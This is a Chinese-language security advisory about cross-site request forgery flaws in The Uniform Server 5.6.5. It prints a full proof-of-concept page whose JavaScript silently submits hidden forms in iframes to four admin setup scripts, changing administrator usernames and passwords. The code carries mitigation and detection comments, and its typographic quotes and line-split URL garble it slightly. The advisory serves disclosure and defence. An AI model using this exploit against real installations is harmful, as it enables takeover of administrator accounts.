The Uniform Server多个页面跨站请求伪造漏洞

受影响系统:

Uniform Server Development Team The Uniform Server 5.6.5

描述:

The Uniform Server是一个可以运行在任何基于Windows操作系统上的WAMP软件包。

The Uniform Server没有执行有效性检查便允许用户通过HTTP请求执行某些操作,远程攻击者可以通过向apsetup.php、psetup.php、sslpsetup.php、mqsetup.php等脚本POST请求执行跨站请求伪造攻击,更改管理员口令。

<*来源:John Leitch
  
  链接:
http://secunia.com/advisories/39913
*>

测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

<html>
<head>
    <script type="text/javascript">
        // Advisory proof-of-concept, kept verbatim as extracted (typographic quote
        // characters included). On page load it builds one self-submitting form per
        // admin setup script and loads each in its own iframe. The comments below are
        // for understanding the exposure and its mitigation.
        //
        // Mitigation (reviewer note): bind every state-changing POST to a per-session
        // synchronizer token and verify it server-side, require the current password
        // before accepting a credential change, validate the Origin/Referer header, and
        // mark the session cookie SameSite so a cross-site iframe submission carries no
        // session. Detection: POSTs to these setup scripts whose Referer/Origin is not
        // the admin panel itself.
        window.onload = function() {
            // Base URL of the admin panel (the literal spans a line break as extracted).
            var url = ‘
http://localhost/apanel’;
            
            // One entry per target: the form action, its method, the script line that
            // presses the submit button, and the fields that get posted. Note what is
            // absent from every field list: no session-bound anti-CSRF token and no
            // current-password field — per the advisory the handlers perform no
            // validity check, so the cookie the browser attaches is all that is needed.
            var xsrs = [
                {
                    "action": url + "/apsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "apuser", "value": "new_username" },
                        { "name": "appass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/psetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/sslpsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "puser", "value": "new_username" },
                        { "name": "ppass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                },
                {
                    "action": url + "/mqsetup.php",
                    "method": "post",
                    "submitCall": "document.forms[0].submit.click()",
                    "fields": [
                        { "name": "qpass", "value": "new_password" },
                        { "name": "submit", "value": "Change", "type": "submit" }
                    ]
                }
            ];

            for (var x = 0; x < xsrs.length; x++) {
                // A separate iframe per target so the four submissions do not interfere.
                var attackFrame = document.createElement(‘iframe’);

                // Assemble the form markup as a string: action and method from the entry ...
                var html = ‘<html><body><form action="’ + xsrs[x].action + ‘" ‘ +
                    ‘method="’ + xsrs[x].method + ‘">’;

                for (var y = 0; y < xsrs[x].fields.length; y++) {
                    // ... then one <input> per field; the type falls back to "hidden"
                    // when the entry gives none, so only the submit button is visible.
                    html += ‘<input type="’ +
                        (xsrs[x].fields[y].type != null ?
                            xsrs[x].fields[y].type : ‘hidden’) + ‘" ‘ +
                        ‘name="’ + xsrs[x].fields[y].name + ‘" ‘ +
                        ‘value="’ + xsrs[x].fields[y].value + ‘" />’;
                }

                // Close the form and append the submitCall inline script. The "\x3c"
                // escape stops the inner "</script>" from terminating the outer
                // <script> element this code lives in.
                html += ‘</form><script>’ + xsrs[x].submitCall + ‘\x3c/script></body></html>’;

                // Attach the frame first so contentDocument exists, then write the markup
                // into it; the inline script presses the submit button as soon as the
                // frame's document is written, with no user interaction.
                document.body.appendChild(attackFrame);

                attackFrame.contentDocument.write(html);
            }
        }
    </script>
</head>
<body>
</body>
</html>

建议:

厂商补丁:

Uniform Server Development Team
——————————-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.uniformserver.com/
